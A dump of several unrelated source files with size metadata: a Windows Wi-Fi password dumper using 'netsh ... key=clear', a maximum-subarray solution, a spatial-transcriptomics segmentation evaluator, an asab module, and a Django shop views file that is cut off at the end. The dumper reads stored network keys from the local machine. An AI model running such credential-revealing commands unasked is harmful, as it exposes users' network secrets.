text
string
size
int64
token_count
int64
#@ayuboid --- salahuddin[@]protonmail.ch/com
"""Dump saved Windows Wi-Fi profile names and their stored passwords.

Uses ``netsh wlan show profiles`` (Windows only). Run from an elevated
shell so ``key=clear`` is allowed to reveal the key material.
"""
import subprocess


class t:
    """Low-level netsh wrappers."""

    def user(self):
        """Return the raw bytes of ``netsh wlan show profiles``."""
        # NOTE: requires an elevated shell on Windows ("run IDE as admin").
        x_1 = subprocess.Popen("netsh wlan show profiles",
                               stdout=subprocess.PIPE)
        stdout = x_1.communicate()[0]
        return stdout

    def password_1(self, name):
        """For each ``[label, profile_name]`` pair in *name*, print the
        profile's stored key (the "Key Content" line), if any."""
        for pswd in name:
            # Profile names must be stripped of the padding netsh adds,
            # otherwise the name="..." lookup fails.
            x_1 = subprocess.Popen(
                r'netsh wlan show profiles name="%s" key=clear' % pswd[1].strip(),
                stdout=subprocess.PIPE)
            # communicate() drains the pipe and returns (stdout, stderr).
            stdout = x_1.communicate()[0]
            stdout = stdout.decode().splitlines()
            for line in stdout:
                if "Key Content" in line:
                    # FIX: split only on the first ':' so passwords that
                    # contain ':' are not truncated, and strip the
                    # leading padding netsh prints after the colon.
                    print("Username : %s\nPassword : %s " %
                          (pswd[1].strip(), line.split(":", 1)[1].strip()))


class t1(t):
    """High-level driver: enumerate profiles, then reveal their keys."""

    def username(self):
        """Return ``[label, profile_name]`` pairs for every saved profile."""
        x_1 = self.user()
        name_list = []
        # Decode (binary to utf8) and then split it by lines.
        x_1 = x_1.decode().splitlines()
        for l in x_1:
            # Profile lines look like "    All User Profile     : <name>".
            if "All User Profile" in l:
                # Split "label : name" -> ['label ', ' name'].
                name_list.append(l.split(":"))
        return name_list

    def password(self):
        """Print username/password for every saved Wi-Fi profile."""
        name_list = self.username()
        self.password_1(name_list)  # prints; returns nothing


b = t1()
b.password()
# print(b.username())  # GET USERNAMES
# You can also use os.system
1,709
528
class Solution(object):
    def XXX(self, nums):
        """
        :type nums: List[int]
        :rtype: int

        Maximum subarray sum, classic divide-and-conquer:
        the answer is the best of (left half, right half, a span
        crossing the midpoint).
        """
        def best(a, lo, hi):
            # Base case: a single element is its own best subarray.
            if lo == hi:
                return a[lo]
            mid = (lo + hi) // 2
            best_left = best(a, lo, mid)
            best_right = best(a, mid + 1, hi)
            # Best suffix of the left half, ending exactly at mid.
            suffix = float("-inf")
            running = 0
            for i in range(mid, lo - 1, -1):
                running += a[i]
                if running > suffix:
                    suffix = running
            # Best prefix of the right half, starting exactly at mid+1.
            prefix = float("-inf")
            running = 0
            for i in range(mid + 1, hi + 1):
                running += a[i]
                if running > prefix:
                    prefix = running
            # A crossing subarray is always suffix + prefix.
            return max(best_left, best_right, suffix + prefix)

        return best(nums, 0, len(nums) - 1)
760
277
import os.path as osp
import pickle
import shutil
import tempfile
import os
import mmcv
import numpy as np
import torch
import torch.distributed as dist
from mmcv.image import tensor2imgs
from mmcv.runner import get_dist_info
import pandas as pd
import json
import cv2
from PIL import Image
from sklearn.metrics.cluster import adjusted_rand_score, adjusted_mutual_info_score, fowlkes_mallows_score, rand_score, \
    silhouette_score, calinski_harabasz_score, davies_bouldin_score
import math
from mmseg.apis.inference import inference_segmentor
from mmseg.apis.inference import init_segmentor

# NOTE(review): this module was recovered from a whitespace-mangled source;
# statement ORDER is faithful but loop/branch nesting was reconstructed —
# confirm against the upstream repository.


def testing_metric(img_path, output_folder, model, show_dir, k):
    """Segment every image under *img_path* and rank results by the MI
    (Moran's-I-style heterogeneity) score.

    If ``k == -1`` the cluster count is chosen automatically: a first pass
    picks the image with the highest MI, a second pass sweeps k in 4..9 on
    that image. Otherwise *k* is used as-is for every image.

    Writes per-image category maps as CSV under ``<output_folder>/result/``,
    rendered maps under ``<output_folder>/segmentation_map/`` and a ranking
    CSV ``top5_MI_value.csv``. Returns the category map (int32 ndarray) of
    the top-ranked image.
    """
    MI_list = []
    name_list = []
    k_list = []
    if k == -1:
        # Pass 1: inference with automatic k; remember the best image by MI.
        # NOTE(review): MI_max is reset INSIDE the loop in the original
        # statement order, so "optimal_name" is the last image with MI > 0.
        for name in os.listdir(img_path):
            MI_max = 0
            img_name = img_path + name
            result = inference_segmentor(model, img_name, k)
            out_file = show_dir + name
            image_test = cv2.imread(img_name)
            MI = cluster_heterogeneity(image_test, result[0], 0)
            if MI_max < MI:
                MI_max = MI
                optimal_name = name
        # Pass 2: sweep k on the selected image and keep the best k by MI.
        for tmp_k in range(4, 10):
            MI_max = 0
            img_name = img_path + optimal_name
            result = inference_segmentor(model, img_name, tmp_k)
            out_file = show_dir + name
            model.show_result(
                img_name, result, palette=None, show=False, out_file=out_file)
            image_test = cv2.imread(img_name)
            if not os.path.exists(output_folder + 'result_temp/'):
                os.makedirs(output_folder + 'result_temp/')
            np.savetxt(output_folder + 'result_temp/' + name.split('.png')[0] + '.csv',
                       result[0], delimiter=',')
            MI = cluster_heterogeneity(image_test, result[0], 0)
            if MI_max < MI:
                MI_max = MI
                optimal_k = tmp_k
        # Re-run with the winning k and record the single result row.
        result = inference_segmentor(model, img_name, optimal_k)
        model.show_result(
            img_name, result, palette=None, show=False, out_file=out_file)
        k_list.append(optimal_k)
        name_list.append(optimal_name)
        MI_list.append(MI_max)
        MI_result = {
            'name': name_list,
            'k': k_list,
            'MI': MI_list,
        }
        MI_result = pd.DataFrame(MI_result)
        MI_result = MI_result.sort_values(by=['MI'], ascending=False)
        if len(name_list) > 5:
            MI_result_top5 = MI_result[0:5]
            name = MI_result_top5.iloc[:, 0].values
            for n in name:
                prefix = n.split('.png')[0]
                show = cv2.imread(show_dir + n)
                if not os.path.exists(output_folder + 'segmentation_map/'):
                    os.makedirs(output_folder + 'segmentation_map/')
                cv2.imwrite(output_folder + 'segmentation_map/' + n, show)
                if not os.path.exists(output_folder + 'result/'):
                    os.makedirs(output_folder + 'result/')
                shutil.move(output_folder + 'result_temp/' + prefix + '.csv',
                            output_folder + 'result/' + prefix + '.csv')
            # shutil.rmtree(show_dir)
            # shutil.rmtree(output_folder+'result_temp/')
            MI_result_top5.to_csv(output_folder + 'top5_MI_value.csv', index=True, header=True)
        else:
            name = MI_result.iloc[:, 0].values
            for n in name:
                prefix = n.split('.png')[0]
                show = cv2.imread(show_dir + n)
                if not os.path.exists(output_folder + 'segmentation_map/'):
                    os.makedirs(output_folder + 'segmentation_map/')
                cv2.imwrite(output_folder + 'segmentation_map/' + n, show)
                if not os.path.exists(output_folder + 'result/'):
                    os.makedirs(output_folder + 'result/')
                shutil.move(output_folder + 'result_temp/' + prefix + '.csv',
                            output_folder + 'result/' + prefix + '.csv')
            shutil.rmtree(show_dir)
            shutil.rmtree(output_folder + 'result_temp/')
            MI_result.to_csv(output_folder + 'top5_MI_value.csv', index=True, header=True)
        top1_name = MI_result.iloc[:, 0].values[0]
        top1_csv_name = output_folder + 'result/' + top1_name.split('.png')[0] + '.csv'
        top1_category_map = np.loadtxt(top1_csv_name, dtype=np.int32, delimiter=",")
    else:
        # Fixed k: score every image and rank by MI.
        for name in os.listdir(img_path):
            img_name = img_path + name
            name_list.append(name)
            result = inference_segmentor(model, img_name, k)
            out_file = show_dir + name
            print(out_file)
            model.show_result(
                img_name, result, palette=None, show=False, out_file=out_file)
            image_test = cv2.imread(img_name)
            if not os.path.exists(output_folder + 'result_temp/'):
                os.makedirs(output_folder + 'result_temp/')
            np.savetxt(output_folder + 'result_temp/' + name.split('.png')[0] + '.csv',
                       result[0], delimiter=',')
            MI = cluster_heterogeneity(image_test, result[0], 0)
            MI_list.append(MI)
        MI_result = {
            'name': name_list,
            'MI': MI_list,
        }
        MI_result = pd.DataFrame(MI_result)
        MI_result = MI_result.sort_values(by=['MI'], ascending=False)
        if len(name_list) > 5:
            MI_result_top5 = MI_result[0:5]
            # print(MI_result_top5)
            name = MI_result_top5.iloc[:, 0].values
            for n in name:
                prefix = n.split('.png')[0]
                show = cv2.imread(show_dir + n)
                if not os.path.exists(output_folder + 'segmentation_map/'):
                    os.makedirs(output_folder + 'segmentation_map/')
                cv2.imwrite(output_folder + 'segmentation_map/' + n, show)
                if not os.path.exists(output_folder + 'result/'):
                    os.makedirs(output_folder + 'result/')
                shutil.move(output_folder + 'result_temp/' + prefix + '.csv',
                            output_folder + 'result/' + prefix + '.csv')
            # shutil.rmtree(show_dir)
            # shutil.rmtree(output_folder+'result_temp/')
            MI_result_top5.to_csv(output_folder + 'top5_MI_value.csv', index=True, header=True)
        else:
            name = MI_result.iloc[:, 0].values
            for n in name:
                prefix = n.split('.png')[0]
                show = cv2.imread(show_dir + n)
                if not os.path.exists(output_folder + 'segmentation_map/'):
                    os.makedirs(output_folder + 'segmentation_map/')
                cv2.imwrite(output_folder + 'segmentation_map/' + n, show)
                if not os.path.exists(output_folder + 'result/'):
                    os.makedirs(output_folder + 'result/')
                shutil.move(output_folder + 'result_temp/' + prefix + '.csv',
                            output_folder + 'result/' + prefix + '.csv')
            shutil.rmtree(show_dir)
            shutil.rmtree(output_folder + 'result_temp/')
            MI_result.to_csv(output_folder + 'top5_MI_value.csv', index=True, header=True)
        top1_name = MI_result.iloc[:, 0].values[0]
        top1_csv_name = output_folder + 'result/' + top1_name.split('.png')[0] + '.csv'
        top1_category_map = np.loadtxt(top1_csv_name, dtype=np.int32, delimiter=",")
        # shutil.rmtree(output_folder + 'result/')
    return top1_category_map


def evaluation_metric(adata, img_path, output_folder, model, show_dir, label_path, k):
    """Like :func:`testing_metric`, but additionally scores each result
    against ground-truth labels (ARI/AMI/FMI/RI via :func:`calculate`).

    Same file-system side effects as ``testing_metric``; the ranking CSV
    gains the clustering-agreement columns. Returns the category map of
    the top-ranked image.
    """
    MI_list = []
    name_list = []
    ARI_list = []
    AMI_list = []
    FMI_list = []
    RI_list = []
    k_list = []
    if k == -1:
        # Pass 1: pick the reference image (see note in testing_metric).
        for name in os.listdir(img_path):
            MI_max = 0
            img_name = img_path + name
            result = inference_segmentor(model, img_name, k)
            out_file = show_dir + name
            image_test = cv2.imread(img_name)
            MI = cluster_heterogeneity(image_test, result[0], 0)
            if MI_max < MI:
                MI_max = MI
                optimal_name = name
        # Pass 2: sweep k, tracking the metrics of the best-MI run.
        for tmp_k in range(4, 10):
            MI_max = 0
            img_name = img_path + optimal_name
            result = inference_segmentor(model, img_name, tmp_k)
            out_file = show_dir + name
            model.show_result(
                img_name, result, palette=None, show=False, out_file=out_file)
            image_test = cv2.imread(img_name)
            if not os.path.exists(output_folder + 'result_temp/'):
                os.makedirs(output_folder + 'result_temp/')
            np.savetxt(output_folder + 'result_temp/' + name.split('.png')[0] + '.csv',
                       result[0], delimiter=',')
            MI = cluster_heterogeneity(image_test, result[0], 0)
            name0, ARI, AMI, FMI, RI = calculate(adata, result[0], img_name, label_path)
            if MI_max < MI:
                MI_max = MI
                optimal_k = tmp_k
                optimal_ARI = ARI
                optimal_MI = MI
                optimal_AMI = AMI
                optimal_FMI = FMI
                optimal_RI = RI
        result = inference_segmentor(model, img_name, optimal_k)
        model.show_result(
            img_name, result, palette=None, show=False, out_file=out_file)
        k_list.append(optimal_k)
        name_list.append(optimal_name)
        MI_list.append(optimal_MI)
        ARI_list.append(optimal_ARI)
        AMI_list.append(optimal_AMI)
        FMI_list.append(optimal_FMI)
        RI_list.append(optimal_RI)
        MI_result = {
            'name': name_list,
            'k': k_list,
            "ARI": ARI_list,
            "AMI": AMI_list,
            "FMI": FMI_list,
            "RI": RI_list,
            'MI': MI_list,
        }
        MI_result = pd.DataFrame(MI_result)
        MI_result = MI_result.sort_values(by=['MI'], ascending=False)
        if len(name_list) > 5:
            MI_result_top5 = MI_result[0:5]
            # print(MI_result_top5)
            name = MI_result_top5.iloc[:, 0].values
            for n in name:
                prefix = n.split('.png')[0]
                show = cv2.imread(show_dir + n)
                if not os.path.exists(output_folder + 'segmentation_map/'):
                    os.makedirs(output_folder + 'segmentation_map/')
                cv2.imwrite(output_folder + 'segmentation_map/' + n, show)
                if not os.path.exists(output_folder + 'result/'):
                    os.makedirs(output_folder + 'result/')
                shutil.move(output_folder + 'result_temp/' + prefix + '.csv',
                            output_folder + 'result/' + prefix + '.csv')
            shutil.rmtree(show_dir)
            shutil.rmtree(output_folder + 'result_temp/')
            MI_result_top5.to_csv(output_folder + 'top5_MI_value.csv', index=True, header=True)
        else:
            name = MI_result.iloc[:, 0].values
            for n in name:
                prefix = n.split('.png')[0]
                show = cv2.imread(show_dir + n)
                if not os.path.exists(output_folder + 'segmentation_map/'):
                    os.makedirs(output_folder + 'segmentation_map/')
                cv2.imwrite(output_folder + 'segmentation_map/' + n, show)
                if not os.path.exists(output_folder + 'result/'):
                    os.makedirs(output_folder + 'result/')
                shutil.move(output_folder + 'result_temp/' + prefix + '.csv',
                            output_folder + 'result/' + prefix + '.csv')
            shutil.rmtree(show_dir)
            shutil.rmtree(output_folder + 'result_temp/')
            MI_result.to_csv(output_folder + 'top5_MI_value.csv', index=True, header=True)
        top1_name = MI_result.iloc[:, 0].values[0]
        top1_csv_name = output_folder + 'result/' + top1_name.split('.png')[0] + '.csv'
        top1_category_map = np.loadtxt(top1_csv_name, dtype=np.int32, delimiter=",")
        shutil.rmtree(output_folder + 'result/')
    else:
        # Fixed k: evaluate every image against the labels.
        for name in os.listdir(img_path):
            img_name = img_path + name
            name_list.append(name)
            result = inference_segmentor(model, img_name, k)
            name0, ARI, AMI, FMI, RI = calculate(adata, result[0], img_name, label_path)
            ARI_list.append(ARI)
            AMI_list.append(AMI)
            FMI_list.append(FMI)
            RI_list.append(RI)
            # print(result[0])
            print(img_name)
            out_file = show_dir + name
            # print(out_file)
            model.show_result(
                img_name, result, palette=None, show=False, out_file=out_file)
            image_test = cv2.imread(img_name)
            if not os.path.exists(output_folder + 'result_temp/'):
                os.makedirs(output_folder + 'result_temp/')
            np.savetxt(output_folder + 'result_temp/' + name.split('.png')[0] + '.csv',
                       result[0], delimiter=',')
            MI = cluster_heterogeneity(image_test, result[0], 0)
            MI_list.append(MI)
        MI_result = {
            'name': name_list,
            "ARI": ARI_list,
            "AMI": AMI_list,
            "FMI": FMI_list,
            "RI": RI_list,
            'MI': MI_list,
        }
        MI_result = pd.DataFrame(MI_result)
        MI_result = MI_result.sort_values(by=['MI'], ascending=False)
        if len(name_list) > 5:
            MI_result_top5 = MI_result[0:5]
            # print(MI_result_top5)
            name = MI_result_top5.iloc[:, 0].values
            for n in name:
                prefix = n.split('.png')[0]
                show = cv2.imread(show_dir + n)
                if not os.path.exists(output_folder + 'segmentation_map/'):
                    os.makedirs(output_folder + 'segmentation_map/')
                cv2.imwrite(output_folder + 'segmentation_map/' + n, show)
                if not os.path.exists(output_folder + 'result/'):
                    os.makedirs(output_folder + 'result/')
                shutil.move(output_folder + 'result_temp/' + prefix + '.csv',
                            output_folder + 'result/' + prefix + '.csv')
            shutil.rmtree(show_dir)
            shutil.rmtree(output_folder + 'result_temp/')
            MI_result_top5.to_csv(output_folder + 'top5_MI_value.csv', index=True, header=True)
        else:
            name = MI_result.iloc[:, 0].values
            for n in name:
                prefix = n.split('.png')[0]
                show = cv2.imread(show_dir + n)
                if not os.path.exists(output_folder + 'segmentation_map/'):
                    os.makedirs(output_folder + 'segmentation_map/')
                cv2.imwrite(output_folder + 'segmentation_map/' + n, show)
                if not os.path.exists(output_folder + 'result/'):
                    os.makedirs(output_folder + 'result/')
                shutil.move(output_folder + 'result_temp/' + prefix + '.csv',
                            output_folder + 'result/' + prefix + '.csv')
            shutil.rmtree(show_dir)
            shutil.rmtree(output_folder + 'result_temp/')
            MI_result.to_csv(output_folder + 'top5_MI_value.csv', index=True, header=True)
        top1_name = MI_result.iloc[:, 0].values[0]
        top1_csv_name = output_folder + 'result/' + top1_name.split('.png')[0] + '.csv'
        top1_category_map = np.loadtxt(top1_csv_name, dtype=np.int32, delimiter=",")
        shutil.rmtree(output_folder + 'result/')
    return top1_category_map


def cluster_heterogeneity(image_test, category_map, background_category):
    """Moran's-I-style heterogeneity score of a segmentation.

    Builds an adjacency matrix W of cluster labels that touch along any row
    or column of *category_map*, then, per BGR channel of *image_test*,
    scores how different adjacent clusters' mean intensities are. The
    *background_category* label is excluded. Returns the RMS of the three
    per-channel scores.

    NOTE(review): the scan assumes a square map (both loops use shape[0])
    and normalization uses shape[0]**2 — confirm inputs are square.
    """
    if len(category_map.shape) > 2:
        category_map = cv2.cvtColor(category_map, cv2.COLOR_BGR2GRAY)
    category_list = np.unique(category_map)
    W = np.zeros((len(category_list), len(category_list)))
    for i in range(category_map.shape[0]):
        flag1 = category_map[i][0]
        flag2 = category_map[0][i]
        for j in range(category_map.shape[0]):
            if category_map[i][j] != flag1:  # label change along row i
                index1 = np.where(category_list == flag1)[0][0]
                index2 = np.where(category_list == category_map[i][j])[0][0]
                W[index1][index2] = 1
                W[index2][index1] = 1
                flag1 = category_map[i][j]
            if category_map[j][i] != flag2:  # label change along column i
                index1 = np.where(category_list == flag2)[0][0]
                index2 = np.where(category_list == category_map[j][i])[0][0]
                W[index1][index2] = 1
                W[index2][index1] = 1
                flag2 = category_map[j][i]
    # Drop the first label's row/column (presumably background —
    # TODO confirm this matches background_category).
    W = W[1:, 1:]
    category_num = W.shape[0]
    MI_list = []
    image_test_ori = image_test
    # Average color value of each cluster, per channel.
    for channel in range(3):
        image_test = image_test_ori[:, :, channel]
        num = 0
        gray_list = []
        gray_mean = 0
        for category in category_list:
            pixel_x, pixel_y = np.where(category_map == category)
            if category == background_category:
                num = len(pixel_x)  # background pixel count, excluded below
                continue
            gray = []
            for i in range(len(pixel_x)):
                gray.append(image_test[pixel_x[i], pixel_y[i]])
            gray_value = np.mean(gray)
            gray_list.append(gray_value)
            gray_mean += gray_value * len(pixel_x)
        # Mean over all non-background pixels.
        gray_mean = gray_mean / (image_test.shape[0] ** 2 - num)
        n = W.shape[0]
        a = 0
        b = 0
        for p in range(n):
            index, = np.where(W[p] == 1)
            for q in range(len(index)):
                a += abs((gray_list[p] - gray_mean) * (gray_list[index[q]] - gray_mean))
            b += (gray_list[p] - gray_mean) ** 2
        MI = n * a / (b * np.sum(W))
        MI_list.append(MI)
    # RMS over the three channels.
    MI = math.sqrt((MI_list[0] ** 2 + MI_list[1] ** 2 + MI_list[2] ** 2) / 3)
    return MI


def calculate(adata, output, img_path, label_path):
    """Score a predicted category map against ground-truth layer labels.

    Flattens both maps, drops positions where the label is 0 (unlabeled),
    and returns ``(img_name, ARI, AMI, FMI, RI)``.
    """
    img_name = img_path.split('/')[-1]  # eg:151507_50_32_....png
    samples_num = img_name.split('_')[0]  # eg:151507
    labels = save_spot_RGB_to_image(label_path, adata)  # ground-truth image
    label = labels.flatten().tolist()
    output = np.array(output).flatten().tolist()
    # print('len(output)',len(output))
    label_final = []
    output_final = []
    shape = adata.uns["img_shape"]
    for i in range(shape ** 2):
        if label[i] != 0:  # keep only annotated pixels
            label_final.append(label[i])
            output_final.append(output[i])
    ARI = adjusted_rand_score(label_final, output_final)
    AMI = adjusted_mutual_info_score(label_final, output_final)
    FMI = fowlkes_mallows_score(label_final, output_final)
    RI = rand_score(label_final, output_final)
    print('name', img_name)
    print('ARI:', ARI)
    return img_name, ARI, AMI, FMI, RI


def save_spot_RGB_to_image(label_path, adata):
    """Rasterize per-spot layer annotations into a label image.

    Reads a barcode->layer CSV from *label_path* (must align with
    ``adata.obs`` after sorting by barcode) and paints a square of side
    ``2*radius`` around each spot with the layer's integer code
    (Layer1..Layer6 -> 1..6, WM -> 7; 0 = unlabeled). The image is then
    resized to ``adata.uns["img_shape"]`` with nearest-neighbor so codes
    stay exact.
    """
    # data_file = os.path.join(data_folder, expression_file)
    X = pd.read_csv(label_path)
    X = X.sort_values(by=['barcode'])
    # print(X)
    # print(adata.obs)
    assert all(adata.obs.index == X.iloc[:, 0].values)
    layers = X.iloc[:, 1].values
    # print(layers)
    spot_row = adata.obs["pxl_col_in_fullres"]
    spot_col = adata.obs["pxl_row_in_fullres"]
    radius = int(0.5 * adata.uns['fiducial_diameter_fullres'] + 1)
    # radius = int(scaler['spot_diameter_fullres'] + 1)
    max_row = max_col = int((2000 / adata.uns['tissue_hires_scalef']) + 1)
    # radius = round(radius * (600 / 2000))
    # max_row = np.max(spot_row)
    # max_col = np.max(spot_col)
    # FIX: np.int was removed in NumPy 1.24; plain int is the documented
    # replacement.
    img = np.zeros(shape=(max_row + 1, max_col + 1), dtype=int)
    img = img.astype(np.uint8)
    for index in range(len(layers)):
        if layers[index] == 'Layer1':
            # print('layer1')
            # img[spot_row[index], spot_col[index]] = [0,0,255]
            img[(spot_row[index] - radius):(spot_row[index] + radius),
                (spot_col[index] - radius):(spot_col[index] + radius)] = 1
            # print(img[spot_row[index],spot_col[index]])
            # cv2.circle(img,(spot_row[index], spot_col[index]),radius,(0,0,255),thickness=-1)
        elif layers[index] == 'Layer2':
            img[(spot_row[index] - radius):(spot_row[index] + radius),
                (spot_col[index] - radius):(spot_col[index] + radius)] = 2
            # img[spot_row[index], spot_col[index]] = [0,255,0]
            # cv2.circle(img,(spot_row[index], spot_col[index]),radius,(0,255,0),thickness=-1)
            # print(img[spot_row[index],spot_col[index]])
        elif layers[index] == 'Layer3':
            img[(spot_row[index] - radius):(spot_row[index] + radius),
                (spot_col[index] - radius):(spot_col[index] + radius)] = 3
            # img[spot_row[index], spot_col[index]] = [255,0,0]
            # cv2.circle(img,(spot_row[index], spot_col[index]),radius,(255,0,0),thickness=-1)
        elif layers[index] == 'Layer4':
            img[(spot_row[index] - radius):(spot_row[index] + radius),
                (spot_col[index] - radius):(spot_col[index] + radius)] = 4
            # img[spot_row[index], spot_col[index]] = [255,0,255]
            # cv2.circle(img,(spot_row[index], spot_col[index]),radius,(255,0,255),thickness=-1)
        elif layers[index] == 'Layer5':
            img[(spot_row[index] - radius):(spot_row[index] + radius),
                (spot_col[index] - radius):(spot_col[index] + radius)] = 5
            # img[spot_row[index], spot_col[index]] = [0,255,255]
            # cv2.circle(img,(spot_row[index], spot_col[index]),radius,(0,255,255),thickness=-1)
        elif layers[index] == 'Layer6':
            img[(spot_row[index] - radius):(spot_row[index] + radius),
                (spot_col[index] - radius):(spot_col[index] + radius)] = 6
            # img[spot_row[index], spot_col[index]] = [255,255,0]
            # cv2.circle(img,(spot_row[index], spot_col[index]),radius,(255,255,0),thickness=-1)
        elif layers[index] == 'WM':
            img[(spot_row[index] - radius):(spot_row[index] + radius),
                (spot_col[index] - radius):(spot_col[index] + radius)] = 7
            # img[spot_row[index], spot_col[index]] = [0,0,0]
            # cv2.circle(img,(spot_row[index], spot_col[index]),radius,(0,0,0),thickness=-1)
    shape = adata.uns["img_shape"]
    label_img = cv2.resize(img, dsize=(shape, shape), interpolation=cv2.INTER_NEAREST)
    return label_img
23,831
8,047
"""Registers the asab Proactor module: configuration defaults plus the
module class that exposes a :class:`ProactorService` on the application."""
import logging

import asab

from .service import ProactorService

#

L = logging.getLogger(__name__)

#

# Defaults for the '[asab:proactor]' config section.
# NOTE(review): reconstructed from a whitespace-mangled source; the bare
# '#' lines are asab's house-style section separators — confirm upstream.
asab.Config.add_defaults(
    {
        'asab:proactor': {
            'max_workers': '0',          # '0' lets the executor pick its own worker count
            'default_executor': True,    # install as the loop's default executor
        }
    }
)


class Module(asab.Module):
    '''
    Proactor pattern based on loop.run_in_executor()
    https://en.wikipedia.org/wiki/Proactor_pattern
    '''

    def __init__(self, app):
        super().__init__(app)
        # Register the service under the canonical asab service name.
        self.service = ProactorService(app, "asab.ProactorService")
467
187
""" Conversion Tunnel ------ checkout > shipment > payment > success Payment process ------- 1. On submitting the form, an AJAX request is done using Stripe in order to get the token 2. An intermediate view is used afterwards to process the payment ofn the backend side 3. If the payment was successful, a redirect is done to the SuccessView """ import json import random from cart import models as cart_models from django.contrib import messages from django.contrib.auth.mixins import LoginRequiredMixin from django.core import cache, paginator from django.db import transaction from django.db.models.aggregates import Avg from django.http.response import Http404, HttpResponseForbidden, JsonResponse from django.shortcuts import get_object_or_404, redirect, render, reverse from django.utils.decorators import method_decorator from django.utils.translation import gettext from django.utils.translation import gettext_lazy as _ from django.views.decorators.cache import cache_page, never_cache from django.views.decorators.csrf import csrf_exempt from django.views.decorators.http import require_POST from django.views.generic import DetailView, ListView, TemplateView, View from shop import models, serializers, sizes, tasks, utilities def create_vue_products(queryset): items = [] for product in queryset: images = product.images variant = product.variant base = { 'id': product.id, 'reference': product.reference, 'url': product.get_absolute_url(), 'collection': { 'name': product.collection.name }, 'name': product.name, 'price': str(product.get_price()), 'main_image': product.get_main_image_url, 'images': list(images.values('id', 'name', 'url', 'web_url', 'variant', 'main_image')), 'variant': list(variant.values('id', 'name', 'verbose_name', 'in_stock', 'active')), 'in_stock': product.in_stock, 'our_favorite': product.our_favorite, 'is_discounted': product.is_discounted, 'price_pre_tax': str(product.price_pre_tax), 'discounted_price': str(product.discounted_price), 'slug': 
product.slug } items.append(base) return items @method_decorator(cache_page(60 * 30), name='dispatch') class IndexView(View): """Base view for the website's shop""" def get(self, request, *args, **kwargs): return render(request, 'pages/shop.html') @method_decorator(cache_page(60 * 15), name='dispatch') class ShopGenderView(View): """Base view for discovering the website's shop by category e.g. gender """ def get(self, request, *args, **kwargs): context = {} gender = kwargs.get('gender') collections = models.Collection.objects.filter( gender=gender.title() ) if collections.exists(): context = {'collections': collections[:3]} return render(request, 'pages/shop_gender.html', context) class ProductsView(ListView): """Main product's page""" model = models.Collection template_name = 'pages/collections.html' context_object_name = 'products' paginate_by = 12 ordering = '-created_on' def get_queryset(self, **kwargs): view_name = self.kwargs.get('collection') try: collection = self.model.objects.get( view_name__exact=view_name ) except: raise Http404("La collection n'existe pas") else: queryset = collection.product_set.filter( active=True, private=False ) category = self.request.GET.get('category', None) if category is None: return queryset authorized_categories = ['all', 'promos', 'favorites'] if category in authorized_categories: if category == 'all': return queryset elif category == 'promos': return queryset.filter(discounted=True) elif category == 'favorites': return queryset.filter(our_favorite=True) else: return queryset def get_context_data(self, **kwargs): context = super().get_context_data(**kwargs) products = self.get_queryset(**kwargs) # Set a specific pagination number to # active depending on which page we are context['current_active_page'] = self.request.GET.get('page', 1) klass = super().get_paginator(products, self.paginate_by) # serialized_products = serializers.ProductSerializer( # instance=klass.object_list, # many=True # ) # context['vue_products'] = 
serialized_products.data # When passing to another category, the previous # products are still in the cache which creates # an issue category = self.request.GET.get('category') # if category is not None: # cache.cache.delete('vue_products') # Specific technique in order to include the # product url, main_image url and images # vue_products = cache.cache.get('vue_products', None) vue_products = create_vue_products(klass.object_list) # if vue_products is None: # cache.cache.set('vue_products', vue_products, timeout=1200) context['vue_products'] = json.dumps(vue_products) collection = self.model.objects.get( view_name__exact=self.kwargs.get('collection'), gender=self.kwargs.get('gender').title() ) context['collection'] = collection return context @method_decorator(cache_page(60 * 15), name='dispatch') class ProductView(DetailView): """View the details of a given product""" model = models.Product template_name = 'pages/product.html' context_object_name = 'product' def post(self, request, **kwargs): data = {'state': False} product = super().get_object() # TODO: Add a method function that prevent # triggering the rest of the method with # any kinds of post requests cart = cart_models.Cart.cart_manager.add_to_cart(request, product) if cart: data.update({'state': True}) else: messages.error( request, "Une erreur s'est produite - ADD-CA", extra_tags='alert-danger' ) return JsonResponse(data=data) def get_queryset(self, **kwargs): queryset = self.model.objects.all() return queryset def get_context_data(self, **kwargs): context = super().get_context_data(**kwargs) product = super().get_object() serialized_product = serializers.ProductSerializer(instance=product) context['vue_product'] = serialized_product.data suggested_products = self.model.objects\ .prefetch_related('images') \ .filter(active=True).exclude(id=product.id)[:3] context['more'] = suggested_products context['has_liked'] = False if self.request.user.is_authenticated: likes = models.Like.objects.filter( 
product=product, user=self.request.user ) if likes.exists(): context.update({'has_liked': True}) reviews = product.review_set.all() context['reviews'] = reviews context['reviews_avg'] = reviews.aggregate(Avg('rating')) return context @method_decorator(never_cache, name='dispatch') class PreviewProductView(LoginRequiredMixin, DetailView): """ This is a custom view for previewing a product in the semi-original context of the main product page """ model = models.Product queryset = models.Product.objects.all() template_name = 'pages/preview.html' context_object_name = 'product' http_method_names = ['get'] def get(self, request, *args, **kwargs): content = super().get(request, *args, **kwargs) if not request.user.is_admin: return HttpResponseForbidden('You are not authorized on this page') return content def get_context_data(self, **kwargs): context = super().get_context_data(**kwargs) product = super().get_object() serialized_product = serializers.ProductSerializer(instance=product) context['vue_product'] = serialized_product.data return context @method_decorator(cache_page(60 * 30), name='dispatch') @method_decorator(csrf_exempt, name='dispatch') class PrivateProductView(DetailView): """ This is a special custom viewing a product in a non classified manner and one that does not appear in the urls of the main site --; this can be perfect for testing a product from a marketing perspective """ model = models.Product queryset = models.Product.product_manager.private_products() template_name = 'pages/product.html' context_object_name = 'product' def post(self, request, **kwargs): product = super().get_object() # TODO: Add a method function that prevent # triggering the rest of the method with # any kinds of post requests cart = cart_models.Cart.cart_manager.add_to_cart(request, product) if cart: return JsonResponse(data={'success': 'success'}) else: return JsonResponse(data={'failed': 'missing parameters'}, status=400) def get_context_data(self, **kwargs): context = 
